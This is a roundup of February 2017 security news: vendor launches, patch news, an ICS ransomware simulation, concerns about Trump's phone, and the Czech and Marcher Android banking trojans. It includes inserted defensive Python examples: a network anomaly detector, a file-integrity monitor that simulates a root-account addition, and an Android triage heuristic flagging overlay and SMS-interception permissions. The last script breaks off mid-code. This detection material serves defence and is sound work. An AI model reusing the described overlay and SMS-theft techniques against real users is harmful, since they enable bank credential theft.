The vulnerabilities in SAP HANA can be exploited together, ERPScan says: “The first vulnerability allows an attacker to create a new user over the Internet without authentication. After that, an adversary can create a new repository. If a package name contains special characters, the server will crash. As a result of the attack, the project would be unavailable meaning a stoppage of developing processes. Moreover, the vendor’s advisory states that other SAP HANA XS components also could be potentially impacted.”

In related news, Microsoft announced on Tuesday that a last minute issue forced the company to delay the release of its security updates for February 2017. It’s unclear when the patches will be made available.


ExtraHop Introduces Real Time Wire-Level Threat Detection

14.2.2017 securityweek Safety
IT analytics firm ExtraHop Networks today announced ExtraHop Addy, a cloud-based machine-learning wire data analytics tool that is being trained to automatically detect anomalies as they happen.

Seattle, Washington-based ExtraHop was born in 2007. It was founded by senior architects Raja Mukerji and Jesse Rothstein, formerly from F5 Networks, with a vision of tapping wire data to provide the most complete and definitive information on the current state of the IT infrastructure. Since then ExtraHop has picked up hundreds of global customers, including Sony, Lockheed Martin, Microsoft, Adobe, and Google.

But the working of the infrastructure is not the only diagnosis that can be drawn from wire data. Wire data has been described by Rothstein as "everything on the network, from the packets to the payload of individual transactions. It is a very deep, very rich source of data... And it's definitive." Inevitably, within that data, are any and all subtle indications of cyber security compromise.

Machine-learning threat detection tools are not new. For the most part, however, they are high-speed forensic tools that rapidly analyze huge volumes of log data -- they can tell you what happened, but not necessarily what is happening.

Addy is a new SaaS offering that takes the data already derived from ExtraHop Network and analyzes it in the cloud. It builds a continuous baseline of normal behavior for every device on the network; it then analyzes what is happening against what it would expect to happen; and it highlights anomalies or issues to the IT team -- or the security team. This takes its potential beyond IT infrastructure monitoring into real time threat detection.

Early access customers have already demonstrated Addy's security value. One large cable company detected a server unexpectedly probing other systems in the datacenter and was immediately able to shut down the compromised server. A financial services firm was able to detect the Dyn DDoS attack in real time and route DNS traffic through an unaffected region to avoid downtime. And a national medical institution averted two potential security breaches when Addy detected international servers probing their DNS, as well as reverse DNS lookups.

Addy learns from both the customer's own environment and also crowd-sourced domain expertise. This means that the behavioral baseline for every device in the network is continuously improving, the accuracy of alerts is increasing, and false positives are minimized.
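The behaviour described in the last few paragraphs (learn what each device normally talks to, compare the live window against it, and raise the devices whose fan-out to new peers is out of character, such as the server that started probing its datacenter neighbours) can be shown in miniature. This is an added example and not ExtraHop's code or an account of how Addy is built; the flow records are constructed, and the field layout, thresholds and function names are the example's own assumptions.

```python
"""
Added example (not ExtraHop/Addy code): a per-device behavioural baseline of
(destination, port) peers, a detector that flags sources whose new-peer
fan-out exceeds what the baseline learned, and a step that folds reviewed
benign activity back into the baseline so it keeps improving.
"""
from collections import defaultdict

# Constructed learning-window flows: (source host, destination host, dst port).
BASELINE_FLOWS = [
    ("web01", "db01", 3306), ("web01", "db01", 3306), ("web01", "cache01", 6379),
    ("web02", "db01", 3306), ("web02", "cache01", 6379),
    ("db01", "backup01", 22), ("db01", "backup01", 22),
]

# Constructed live window: db01, which normally only talks to backup01 over
# SSH, starts reaching every neighbour on SMB and RDP ports.
LIVE_FLOWS = [
    ("web01", "db01", 3306), ("web02", "cache01", 6379),
    ("db01", "backup01", 22),
    ("db01", "web01", 445), ("db01", "web02", 445), ("db01", "cache01", 445),
    ("db01", "web01", 3389), ("db01", "web02", 3389),
]


def build_baseline(flows):
    """Per source: the set of (dst, port) peers seen while learning, and the
    number of distinct peers, used as that device's normal fan-out."""
    peers = defaultdict(set)
    for src, dst, port in flows:
        peers[src].add((dst, port))
    return {src: {"peers": p, "fanout": len(p)} for src, p in peers.items()}


def detect_anomalies(baseline, flows, new_peer_ratio=1.0, min_new_peers=3):
    """Return (source, reason, new_peers) for each source whose never-seen
    (dst, port) pairs in the live window number at least `min_new_peers` and
    at least `new_peer_ratio` times its learned fan-out. A source absent from
    the baseline is flagged outright as an unknown device."""
    new_peers = defaultdict(set)
    for src, dst, port in flows:
        known = baseline.get(src, {}).get("peers", set())
        if (dst, port) not in known:
            new_peers[src].add((dst, port))
    alerts = []
    for src, fresh in sorted(new_peers.items()):
        if src not in baseline:
            alerts.append((src, "unknown device", sorted(fresh)))
            continue
        expected = baseline[src]["fanout"]
        if len(fresh) >= min_new_peers and len(fresh) >= new_peer_ratio * expected:
            alerts.append((src, "fan-out beyond baseline", sorted(fresh)))
    return alerts


def update_baseline(baseline, flows):
    """Fold flows an analyst has reviewed as benign into the baseline, so the
    next comparison treats them as normal (the 'continuously improving' part)."""
    for src, dst, port in flows:
        entry = baseline.setdefault(src, {"peers": set(), "fanout": 0})
        entry["peers"].add((dst, port))
        entry["fanout"] = len(entry["peers"])
    return baseline


if __name__ == "__main__":
    baseline = build_baseline(BASELINE_FLOWS)
    for src, reason, fresh in detect_anomalies(baseline, LIVE_FLOWS):
        print(f"ALERT {src}: {reason}; new peers: {fresh}")
```

The ratio and minimum-count thresholds are deliberately simple; a real system would weight by time of day, protocol and the device's role, but the shape of the check (new peers relative to learned fan-out, with unknown devices escalated separately) is the part worth copying.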

For the most part, the wire data sent to the cloud for analysis is kept in customer-specific compartments. Although that data includes nothing personally identifiable, this is an added assurance for customers concerned with any form of network data sharing, or otherwise concerned about the evolving data protection laws.

"ExtraHop provides a real-time view across the entire IT environment," explains Rothstein. "With Addy, we're taking the next step, applying machine learning techniques to this vast data set while leveraging the scale, elasticity, and compute power of the cloud."

Addy is available through an Early Access Program for select participants now, and will be available generally in April 2017.


Last Minute Issue Delays Microsoft Security Updates

14.2.2017 securityweek Vulnerebility
Microsoft has apologized to customers “for any inconvenience” after a last minute issue forced the company to delay the release of its security updates for February 2017. It’s unclear when the patches will be made available.

“Our top priority is to provide the best possible experience for customers in maintaining and protecting their systems. This month, we discovered a last minute issue that could impact some customers and was not resolved in time for our planned updates today,” Microsoft said. “After considering all options, we made the decision to delay this month’s updates.”

The security updates released by the company for January 2017 consisted of only four bulletins, including one for Flash Player fixes. It is unclear how many flaws will be patched this month, but many hope Microsoft will address the recently disclosed denial-of-service (DoS) flaw in Windows caused by how SMB traffic is handled.

Starting with this month, Microsoft will no longer publish security bulletins, replacing them with an online database called Security Updates Guide. For January, the company published both security bulletins and some release notes in the Security Updates Guide.

Microsoft has recently introduced a new patch process that includes a Monthly Rollup, which contains both security and non-security fixes, a preview of the Monthly Rollup, and security-only updates.

In order to reduce the size of the security-only update, starting with this month, Internet Explorer patches will be made available as a separate update. The Monthly Rollup will include all patches, including the ones for IE.

The decision to separate the browser updates was made after users asked Microsoft to provide increased flexibility by allowing them to independently deploy Windows and Internet Explorer patches.

Johannes B. Ullrich, dean of research at the SANS Technology Institute, speculated that this change in process may have caused this month’s delay.


Simulation Shows Threat of Ransomware Attacks on ICS

14.2.2017 securityweek Virus
Researchers at the Georgia Institute of Technology have demonstrated the potential impact of ransomware on industrial control systems (ICS) by simulating an attack aimed at a water treatment plant.

David Formby, a Ph.D. student in the Georgia Tech School of Electrical and Computer Engineering, and his faculty advisor, Raheem Beyah, identified several commonly used programmable logic controllers (PLCs) and tested three of them to determine how easily they can be hacked.

Once the devices were tested, including their password security and susceptibility to unauthorized configuration changes, the experts combined them with tubes, pumps and tanks in order to simulate a water treatment facility.

The attack simulation shows how an attacker with access to the PLCs can close valves, display false information to the operator, and increase the amount of chlorine added to the water.

“We were able to simulate a hacker who had gained access to this part of the system and is holding it hostage by threatening to dump large amounts of chlorine into the water unless the operator pays a ransom,” Formby said. “In the right amount, chlorine disinfects the water and makes it safe to drink. But too much chlorine can create a bad reaction that would make the water unsafe.”

Formby and Beyah discovered 1,400 instances of a single PLC type being accessible from the Internet, and pointed out that the organizations housing them often believe the devices are not vulnerable to attacks.


Ransomware attacks typically target data, even if the victim is a critical infrastructure organization. Last year, the Board of Water and Light (BWL) in Lansing, Michigan, was targeted with ransomware, but the attack affected its corporate network and there was no disruption to water or energy supplies.

However, Formby, Beyah and other experts believe profit-driven cybercriminals could increasingly attack ICS, especially since these systems are often poorly protected.

Experts recently raised concerns about ransomware being brought into the industrial domain when KillDisk, a disk-wiping malware used in high-profile attacks aimed at ICS, had been modified to include ransomware capabilities.


HPE Launches Threat Investigation, IoT Data Security Products

14.2.2017 securityweek Security
Hewlett Packard Enterprise (HPE) announced on Tuesday the launch of a new threat investigation solution, ArcSight Investigate, and a new SecureData product for IoT and big data.

HPE Security ArcSight Investigate is a product designed to provide security operations center (SOC) teams fast and intuitive search functionality to help them identify and respond to significant threats.

ArcSight Investigate can be integrated with Hadoop and other ArcSight products, including Data Platform (ADP) and Enterprise Security Manager (ESM).

The product is expected to become generally available in the second quarter. In the meantime, organizations interested in ArcSight Investigate can sign up for the early access program.

HPE has also unveiled SecureData for Hadoop and IoT. The product enables organizations to secure IoT data at rest, in transit and in use through integration with the Apache NiFi data processing and distribution platform.

As for protecting big data, HPE SecureData for Hadoop and IoT integrates with Hortonworks DataFlow (HDF) in order to secure information throughout the dataflow management and streaming analytics process. HPE says the original format of the encrypted data is preserved for processing and enabling secure big data analytics.

“While IoT and big data analytics are driving new ways for organizations to improve efficiencies, identify new revenue streams, and innovate, they are also creating new attack vectors for leaking sensitive information to adversaries,” said HPE’s Albert Biketi. “HPE SecureData enables business users to easily build data security in, delivering persistent protection in IoT and big data ecosystems, and allowing organizations to securely innovate.”

HPE SecureData for Hadoop and IoT is generally available worldwide as part of the company’s SecureData offering.


IBM's Watson Aims its Power at Security Operations Centers

14.2.2017 securityweek Security

Watson for Cyber Security Integrates With IBM's New Cognitive Security Operations Center

The power of IBM's cognitive computing Watson has been directed at cyber security. For the last year, Watson has been absorbing the collective knowledge of a million cyber security studies, scientific reports and analyses. Now Watson is ready to stand behind the shoulders of the analysts that sift through the network alerts thrown up by the QRadar security intelligence platform in what IBM calls its Cognitive SOC.

Watson's purpose is to advise the analysts. It gains its knowledge through parsing the free text documents that hold the greater part of the world's security knowledge. Human analysts could never read the volume of data that is available -- but it is light work for a machine. Watson takes free text documents and parses them; absorbing key knowledge and relationships. Some of the data it absorbs could be wrong; but Watson relies on the power of collective crowd knowledge to sift the wheat from the chaff. The result is a huge and accessible corpus of security expertise.

The human analysts are also struggling with the sheer volume of events coming from their security intelligence platform. According to IBM, security teams must sift through up to 200,000 security events every day. Most of these are false positives that still need to be checked; but the result is up to 20,000 hours wasted every year. This is expected to double over the next five years.

Given the dearth of analysts, and especially the sparsity of expert analysts, this is a problem that will only get worse. Security intelligence platforms, such as QRadar, can generate huge volumes of warnings -- they create their own subset of Big Data. But the bloom of Big Data is wearing thin: the haystack is getting bigger, but mostly it just makes finding the needle harder.

Watson hides its own big data of knowledge within the machine, and then uses the power of the machine to direct the analyst to more targeted threat hunting in the QRadar alerts. The new app, IBM QRadar Advisor with Watson, is the first tool to tap Watson's security insights, and is already being used by 40 IBM customers including Avnet, the University of New Brunswick and Sogeti.

"Today's sophisticated cybersecurity threats attack on multiple fronts to conceal their activities, and our security analysts face the difficult task of pinpointing these attacks amongst a massive sea of security-related data," explains Sean Valcamp, Chief Information Security Officer at Avnet.

"Watson makes concealment efforts more difficult by quickly analyzing multiple streams of data and comparing it with the latest security attack intelligence to provide a more complete picture of the threat. Watson also generates reports on these threats in a matter of minutes, which greatly speeds the time between detecting a potential event and my security team's ability to respond accordingly."

While Watson and QRadar are the key elements of the Cognitive SOC, IBM is extending it to the endpoint with the announcement of BigFix Detect. This is an endpoint detection and response (EDR) solution designed to detect and respond to malicious behavior in endpoints.

"The Cognitive SOC is now a reality for clients looking to find an advantage against the growing legions of cybercriminals and next generation threats," said Denis Kennelly, Vice President of Development and Technology, IBM Security. "Our investments in Watson for Cybersecurity have given birth to several innovations in just under a year. Combining the unique abilities of man and machine intelligence will be critical to the next stage in the fight against advanced cybercrime."

IBM is planning to improve the analyst (man) to Watson (machine) interface with a new research project code-named Havyn, a voice-powered security assistant that will make Watson respond to the analysts' verbal commands and natural language. IBM is not the only vendor seeking to use natural language as the interface between man and machine. Earlier this month Dynatrace announced Davis, focused on monitoring the IT ecosystem. "It gives," announced the firm, "non-technical teams the ability to monitor and understand network health and performance issues via familiar communication tools. 'davis' has effectively 'consumerized' IT – this is an industry first."

Similarly, Endgame announced Artemis in late January. Artemis is a natural language chat interface between analysts and the Endgame Detect and Respond platform. The purpose behind Havyn, Davis and Artemis is to reduce the time spent by analysts in hunting out threats.

The IBM Cognitive SOC can be built on premise or built in the cloud through IBM Managed Security Services.

In November 2016, IBM Security unveiled a new global headquarters in Cambridge, Massachusetts, which features a physical Cyber Range designed to allow organizations in the private sector to prepare for and respond to cyber threats.


Qualys Expands Detection, Web App Security, and Data Sharing Portfolio

14.2.2017 securityweek Security
SAN FRANCISCO - RSA CONFERENCE 2017 - Cloud-based security and compliance solutions provider Qualys this week announced new tools and features to provide customers with improved detection capabilities, expanded web application security features, and improved vulnerability data sharing.

Qualys added two new detection solutions to its Cloud Platform, in the form of Qualys File Integrity Monitoring (FIM) and Indicators of Compromise (IOC), both meant to deliver more critical security and compliance functions in a single cloud-based dashboard. FIM and IOC bring to the Qualys Cloud Agent a combination of prevention and detection by adding continuous visibility of breaches and system changes to the single-pane view of security and compliance posture that the Agent already offers.

Qualys FIM was designed to log and centrally track file change events across global IT systems, while offering a single-view dashboard for identifying critical changes, incidents, and audit risks caused by various factors, including normal patching and administrative tasks, change control exceptions or violations, and malicious activity.

A cloud-based solution, FIM doesn’t require the deployment and maintenance of complex security infrastructure, which also results in improved compliance, reduced downtime, and limited damage from compromise. With FIM, customers get features such as out-of-the-box profiles based on industry best practices and vendor-recommended guidelines, real-time change engine to monitor files and directories specified in the monitoring profile, and automated change reviews of workflows.
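The core of what the two paragraphs above describe, a baseline of file state compared against the current state to classify change events within a monitoring profile, fits in a short script. This is an added example and not Qualys code; the sample tree is constructed in a temporary directory, and the glob-pattern profile and function names are the example's own assumptions.

```python
"""
Added example (not Qualys FIM code): snapshot the digest, size and mode of
every file matching a monitoring profile, then diff two snapshots into
added / removed / modified / permissions events.
"""
import fnmatch
import hashlib
import os
import tempfile


def _digest(path):
    """SHA-256 of a file, read in chunks so large files do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root, patterns=("*",)):
    """Map each monitored file (path relative to root, '/'-separated) to its
    digest, size and permission bits. `patterns` is the monitoring profile."""
    state = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if not any(fnmatch.fnmatch(rel, p) for p in patterns):
                continue
            st = os.stat(full)
            state[rel] = {"sha256": _digest(full), "size": st.st_size,
                          "mode": st.st_mode & 0o777}
    return state


def diff(baseline, current):
    """Classify each path as added, removed, modified (content changed) or
    permissions (only the mode bits changed). Returned in path order."""
    events = []
    for rel in sorted(set(baseline) | set(current)):
        old, new = baseline.get(rel), current.get(rel)
        if old is None:
            events.append(("added", rel))
        elif new is None:
            events.append(("removed", rel))
        elif old["sha256"] != new["sha256"]:
            events.append(("modified", rel))
        elif old["mode"] != new["mode"]:
            events.append(("permissions", rel))
    return events


def demo():
    """Build a constructed tree, baseline only etc/, make three kinds of
    change (one of them outside the profile), and return the resulting events."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "etc"))
        # Constructed file contents; not real system files.
        files = {"etc/passwd": b"root:x:0:0\n", "etc/ssh_config": b"Port 22\n",
                 "app.log": b"started\n"}
        for rel, data in files.items():
            with open(os.path.join(root, rel), "wb") as f:
                f.write(data)
            os.chmod(os.path.join(root, rel), 0o644)  # fixed mode, independent of umask
        profile = ("etc/*",)
        baseline = snapshot(root, profile)

        with open(os.path.join(root, "etc/passwd"), "ab") as f:
            f.write(b"svc:x:0:0\n")                      # content change
        os.chmod(os.path.join(root, "etc/ssh_config"), 0o600)  # mode-only change
        open(os.path.join(root, "etc/new.conf"), "wb").close()  # new file
        with open(os.path.join(root, "app.log"), "ab") as f:
            f.write(b"noise\n")                          # outside the profile: ignored
        return diff(baseline, snapshot(root, profile))


if __name__ == "__main__":
    for kind, rel in demo():
        print(f"{kind:12s} {rel}")
```

Keeping the profile narrow is what keeps the event stream reviewable: the log write outside etc/ produces nothing, while the three changes inside it each produce one typed event that can be matched against change-control records before being treated as an incident.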

Qualys IOC, on the other hand, continuously monitors endpoint activity for suspicious activity that could signal the presence of known malware, unknown variants, and threat actor activity on devices both on and off the network. The solution brings together endpoint detection, behavioral malware analysis, and threat hunting techniques, the company says.

Qualys IOC provides customers with continuous event collection through Cloud Agent's data collection and delta processing techniques, as well as with highly scalable detection processing (as analysis, hunting, and threat indicator processing are performed in the cloud). Moreover, the solution offers actionable intelligence for security analysts, to help them prioritize responses for critical business systems.

According to Qualys, security administrators will benefit from multiple enhancements that FIM and IOC bring to the Cloud Agent and cloud-based processing platform, including easy setup and no maintenance needs (modules can be instantly activated), minimal impact on performance (the Cloud Agent monitors file changes and system activity locally but sends all data to the Cloud Platform), unified security posture (FIM and IOC alert data is presented in a single, integrated view), and integration with AssetView (providing dynamic dashboards, interactive and saved searches, and visual widgets to analysts).

“Breaches continue to rise despite the investments in traditional mechanisms that organizations have deployed to support their businesses in the new era of digital transformation. Our new disruptive services for FIM and IOC extend the capabilities of our Cloud Agent platform, allowing companies to get the visibility and prevention they need against cyber threats from one single platform, drastically reducing their security costs,” Philippe Courtot, chairman and CEO, Qualys, said.

Expanded web application security offerings

With the release of Qualys Web Application Scanning (WAS) 5.0 and Web Application Firewall (WAF) 2.0 this week, the company added new functionality to its web application security offerings, in an attempt to provide customers with scalable fast scanning, detection and patching of websites, mobile applications and Application Programming Interfaces (APIs), in one unified platform.

The newly released WAS 5.0 offers not only programmatic scanning of Simple Object Access Protocol (SOAP) APIs, but also the testing of REpresentational State Transfer (REST) API services, Qualys announced. It also delivers scanning of IoT (Internet of Things) services and mobile apps, as well as API-based business-to-business connectors, and can automatically load-balance scanning of multiple applications across a pool of scanner appliances for efficiency. Moreover, improvements made to Progressive Scanning allow customers to scan very large sites one slice at a time, to cover large applications that are problematic to scan in a short window.

WAF 2.0, on the other hand, offers a one-click virtual patching feature to address both false positives and the inability to quickly patch vulnerabilities; out-of-the-box security templates for popular platforms such as WordPress, Joomla, Drupal and Outlook Web Application; and support for VMware, Hyper-V, and Amazon Web Services, along with features such as load-balancing of web servers, health checks for business-critical web applications, custom security rules based on HTTP request attributes, reusable Secure Sockets Layer profiles, detailed event log information, and centralized management.

Both Qualys WAS 5.0 and WAF 2.0 are available now as annual subscriptions. Pricing for Qualys WAS starts at $1,695 for small businesses and $2,495 for larger enterprises, while pricing for the WAF solution starts at $1,995 for small businesses and $9,995 for larger enterprises.

Vulnerability data sharing

In addition to the expanded portfolio, Qualys also announced a partnership with crowdsourced security testing company Bugcrowd to allow joint customers to share vulnerability data across automated web application scanning and crowdsourced bug bounty programs.

The joint integration between Bugcrowd Crowdcontrol and Qualys Cloud Platform brings together automated web application scanning (WAS) and penetration-testing crowd in a single solution. Thus, joint customers should be able to eliminate vulnerabilities discovered by Qualys WAS from their list of offered bug bounties, while focusing on Bugcrowd programs and critical vulnerabilities that require manual testing.

The initial stage in this collaboration allows Bugcrowd customers who also have Qualys WAS to import vulnerability data into the Bugcrowd Crowdcontrol platform and use it to optimize their bug bounty program scope and incentives. In the future, joint customers running a bug bounty platform on Bugcrowd will be able to import unique vulnerabilities from Crowdcontrol into Qualys WAS and apply one-click patches through the fully integrated Qualys Web Application Firewall.

“With the move of IT to the cloud and all the digital transformation efforts underway, web apps are exploding and securing these apps is now front and center. By combining the automation of Qualys Web Application Scanning (WAS) and Bugcrowd's crowd sourcing platform, organizations can now cover a much larger number of applications and secure them more effectively at a lower cost,” Sumedh Thakar, Chief Product Officer, Qualys, said.


Senators Launch Query on Trump's Smartphone Security

14.2.2017 securityweek Mobil
Washington - Two US senators have requested details on President Donald Trump's smartphone security, saying he could jeopardize national secrets if he is still using his old handset, as some reports say.

"Did Trump receive a secured, encrypted smartphone for his personal use on or before Jan. 20? If so, is he using it?" said a tweet Tuesday by Senator Tom Carper, who along with fellow Democrat Claire McCaskill released a letter to the administration requesting information on the president's device.

"Trump should be well aware by now of the appropriate and necessary protocol to safeguard our nation's secrets."

The letter from the two lawmakers, dated February 9, was sent to Defense Secretary James Mattis along with Homeland Security chief John Kelly and the National Security Agency director Michael Rogers. The senators released the letter late Monday.

The lawmakers said they were concerned by reports that Trump was still using an Android device that may be several years old for his frequent personal Twitter messages.

"While it is important for the president to have the ability to communicate electronically, it is equally important that he does so in a manner that is secure and that ensures the preservation of presidential records," the letter said.

"The national security risks of compromising a smartphone used by a senior government official, such as the president of the United States, are considerable."

The New York Times reported last month that while Trump had received a new, secure device after his inauguration, he still relied on his older device despite protests from aides.

That report prompted a flurry of comments from security experts who argued that the president would be inviting danger by using his old personal phone.

Trump's smartphone "would probably be the most widely prized device on the internet for hackers -- and top of the target list for intelligence agencies around the world," said independent security researcher Graham Cluley in a blog post Tuesday.

Last month, Nicholas Weaver of the International Computer Science Institute in Berkeley, California, warned that "Trump's continued use of a dangerously insecure, out-of-date Android device should cause real panic."

Writing on the Lawfare blog, Weaver noted that hackers could gain access to the phone's location as well as its microphone and camera and that "the working assumption should be that Trump's phone is compromised by at least one -- probably multiple -- hostile foreign intelligence services and is actively being exploited."


Over a Dozen Code Execution Flaws Patched in Flash Player

14.2.2017 securityweek Vulnerebility
Adobe on Tuesday released security updates that address two dozen vulnerabilities in Flash Player, Digital Editions and the Campaigns marketing tool, but none of the flaws have been exploited in the wild.

Flash Player 24.0.0.221 patches 13 critical vulnerabilities that can be exploited for arbitrary code execution, including type confusion, integer overflow, use-after-free, heap buffer overflow and other memory corruption issues.

The security holes were reported to Adobe by researchers at Google Project Zero, Microsoft, Palo Alto Networks, Fortinet’s FortiGuard Labs and CloverSec Labs.

In the Digital Editions ebook reader Adobe fixed nine flaws with the release of version 4.5.4 for Windows, Mac and Android. The patched vulnerabilities include a critical heap-based buffer overflow that can be exploited for arbitrary code execution and several important buffer overflows that could lead to a memory leak.

A majority of the flaws were reported to Adobe by Steven Seeley of Source Incite, but the critical issue was identified by Ke Liu of Tencent's Xuanwu LAB.

With the release of Adobe Campaign 6.11 for Windows and Linux, the vendor patched a moderate severity security bypass flaw affecting the client console. The weakness allows an authenticated attacker to upload and execute a malicious file, which could result in read/write access to the system.

A second flaw addressed in the latest version of Campaign is a moderate severity input validation bug that can be exploited for cross-site scripting (XSS) attacks. The vulnerabilities were reported to Adobe by researcher Léa Nuel.


Senators want more info on Trump’s personal phone and its defense
14.2.2017 securityaffairs Mobil

Two US senators want detailed info on Trump’s personal phone and the way the Defense Information Systems Agency (DISA) will protect it.
Recently, security experts warned of the risk of cyber attacks on Trump's personal phone, which may be open to hackers. The news of Trump's use of an Android smartphone was first reported by The New York Times.
President Trump is still using his insecure personal Android smartphone, and at the end of January the researcher who goes by the moniker @WauchulaGhost reported that his Twitter account was exposed to the risk of being hacked due to security misconfigurations.

The official @POTUS Twitter account was linked to a private Gmail account owned by President Trump.

News of the day is that two senators have written to the U.S. Department of Defense requesting more info about the fact that President Donald Trump may still be using an unsecured Android phone.

“We write today regarding the security concerns stemming from President Donald Trump’s reported use of his personal, unofficial, smartphone. Public reports originally indicated that President Trump began using a “secure, encrypted device approved by the U.S. Secret Service” prior to taking office. Subsequent reports, however, suggest that President Trump may still be using his personal smartphone, an “old, unsecured Android phone.“” reads the letter sent by Tom Carper, a Democrat from Delaware, and Claire McCaskill, a Democrat from Missouri.

“While it is important for the President to have the ability to communicate electronically, it is equally important that he does so in a manner that is secure and that ensures the preservation of presidential records,”

Senators fear that nation-state actors could hack into Trump's personal phone and access sensitive information.

“These reports are very troubling because security risks associated with the use of an unsecured phone include hackers’ ability to access the device to turn on audio recording and camera features, as well as engaging surveillance tools that allow location and other information tracking features” continues the letter.

Attackers could exploit security flaws in Trump's personal phone to spy on his communications; for this reason, national security agencies discourage the use of personal mobile devices.

“DoD policies, operational constructs, and security vulnerabilities currently prevent the adoption of devices that are unapproved and procured outside of official government acquisition.” reads the Department of Defense’s 2013 Commercial Mobile Device Implementation Plan cited by the senators in the letter.

The senators request a written response on what kind of device President Trump is using for his communications, and they want more information about the Defense Information Systems Agency (DISA) initiative to protect presidential communications.

They want to know whether the DoD agency has written specific policies and procedures to mitigate the risks related to the use of Trump's personal phone.


Dangerous malware is spreading via SMS in the Czech Republic

14.2.2017 SecurityWorld Viry
Analysts at ESET have detected the first cases of a new wave of attacks on banks in the Czech Republic and Slovakia via mobile banking. The cybercriminals used Android malware localized for domestic users and spread it through ordinary SMS messages.

A new wave of malware spread by fraudulent SMS messages is targeting the Czech Republic. According to current information, the attackers have so far focused only on ČSOB. However, the range of targeted banks can be expected to widen soon, says Lukáš Štefanko of ESET.

The trojan for the Android platform is a new variant of an already known malware family that spread in late January through fake SMS messages impersonating communication from Česká pošta (the Czech Post) or the retailer Alza.cz.

When the user opens internet banking, the malware Android\Trojan.Spy.Banker.HV presents a fake login page. An inattentive user thus unknowingly sends their login credentials to the fraudsters and exposes themselves to the risk of having their account emptied.

In the current attack campaign running in the Czech Republic and Slovakia, this dangerous malware is spread via SMS messages containing a link to a supposed DHL application, which instead downloads a fraudulent app named "Flash Player 10 Update" bearing the DHL icon.

Although the attackers changed the app's name, they have not yet changed the icon, which looks suspicious when the app is installed in a Czech or Slovak environment.


Experts warn of the rapid growth of the Marcher Android banking Trojan
14.2.2017 securityaffairs Android

Malware researchers at the security firm Securify have published a detailed analysis of the Marcher Android banking Trojan.
Security experts at Securify have published a detailed analysis of the Marcher Android banking Trojan, a threat that has been around since late 2013. The first variants of the malware were developed to trick users into handing over their payment card details using Google Play phishing pages. In March 2014, Marcher was observed targeting bank customers in Germany.

In the second half of 2016, the threat targeted dozens of organizations in various countries, including U.S., U.K., Australia, France, Poland, Turkey, and Spain.

The malicious code has been disguised as various popular apps, including WhatsApp and Netflix.

In early 2017, security experts at Zscaler spotted a strain of the Marcher Android Trojan masquerading as the recently released Super Mario Run mobile game for Apple's iOS.

Super Mario Run is still not available for Android, and crooks are taking advantage of this to spread their malicious variant.

“In this new strain, the Marcher malware is disguised as the Super Mario Run app for Android. Knowing that Android users are eagerly awaiting this game, the malware will attempt to present a fake web page promoting its release.” states the analysis published by Zscaler.

Researchers at Securify have detected nine Marcher botnets over the last six months; the threat actors leverage web injects to target a large number of different apps.

The vast majority of bots were located in Germany (51%), followed by France (20%), and UK (7%).

“Based on statistics of the backend we know that their campaign has successfully infected 5696 German and 2198 French mobile devices over total of 11049 affected mobile devices.” reads the analysis published by Securify. “While assessing their C2 server, we found that most infected devices are running Android 6.0.1. The C2 server at the time of investigation contained at least 1300 credit card numbers and other bank information (username/password + SMS tan). “

Marcher botnet

The Marcher malware is able to check foreground apps, when a targeted app is executed the malicious code uses an overlay screen to trick victims into handing over sensitive information, such as login credentials and credit card data.

“Marcher is one of the few Android banking Trojans to use the AndroidProcesses library, which enables the application to obtain the name of the Android package that is currently running in the foreground. This library is used because it uses the only (publicly known) way to retrieve this information on Android 6 (using the process OOM score read from the /proc directory),” Securify researchers explained.

The malware also implements a simple but effective antivirus evasion technique: it maintains a list of the most popular antivirus solutions and prevents them from removing it. Marcher monitors for any AV app on the list and, if one is running, forces the mobile device back to the home screen. Even if the AV program detects the Marcher malware, it will still wait and ask the user for permission before removing it; because the user cannot grant that permission, the malware is not deleted.
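The two passages above describe what makes an overlay banking trojan work on the device: it sits outside a trusted store, it can draw over other apps, it needs to know which app is in the foreground, and it harvests SMS TANs. The following script is an added example (not Securify's or Zscaler's code) that turns those traits into a triage heuristic over an installed-app inventory. The permission names and the Google Play installer package are real Android identifiers; the weights, the threshold and the inventory records are this example's own constructed assumptions.

```python
"""Triage of an Android app inventory for the traits of overlay banking trojans
such as Marcher: an app installed outside a trusted store that can draw over other
apps, observe which app is in the foreground, and read incoming SMS (mTAN theft).
Added example, not Securify's or Zscaler's code; the inventory below is constructed."""

# Real Android permission names and the Google Play installer package; the weights
# and the flagging threshold are this example's assumptions, not published criteria.
OVERLAY = "android.permission.SYSTEM_ALERT_WINDOW"       # draw windows over other apps
USAGE_STATS = "android.permission.PACKAGE_USAGE_STATS"   # see the foreground app without /proc tricks
RECEIVE_SMS = "android.permission.RECEIVE_SMS"           # intercept SMS, e.g. bank TAN codes
TRUSTED_INSTALLERS = {"com.android.vending"}             # Google Play

# Apps the article says Marcher has impersonated; a sideloaded app wearing one of
# these labels under an unfamiliar package name is a strong signal.
IMPERSONATED_LABELS = {"whatsapp", "netflix", "super mario run"}


def score_app(app):
    """Return (score, reasons) for one inventory record."""
    score, reasons = 0, []
    sideloaded = app.get("installer") not in TRUSTED_INSTALLERS
    perms = set(app.get("permissions", ()))
    if sideloaded:
        score += 1
        reasons.append("installed outside a trusted store")
    if OVERLAY in perms:
        score += 2
        reasons.append("can draw over other apps (overlay)")
    if USAGE_STATS in perms:
        score += 1
        reasons.append("can observe the foreground app")
    if RECEIVE_SMS in perms:
        score += 1
        reasons.append("can intercept incoming SMS")
    if sideloaded and app.get("label", "").strip().lower() in IMPERSONATED_LABELS:
        score += 2
        reasons.append("impersonates a popular app")
    return score, reasons


def triage(inventory, threshold=4):
    """Flag apps whose score reaches `threshold`, highest score first."""
    flagged = []
    for app in inventory:
        score, reasons = score_app(app)
        if score >= threshold:
            flagged.append({"package": app["package"], "score": score, "reasons": reasons})
    return sorted(flagged, key=lambda f: -f["score"])


INVENTORY = [  # constructed sample inventory; com.example.* packages are placeholders
    {"package": "com.whatsapp", "label": "WhatsApp", "installer": "com.android.vending",
     "permissions": [OVERLAY, RECEIVE_SMS]},
    {"package": "com.example.screendimmer", "label": "Screen Dimmer",
     "installer": "com.android.vending", "permissions": [OVERLAY]},
    {"package": "com.example.fake.mario", "label": "Super Mario Run", "installer": None,
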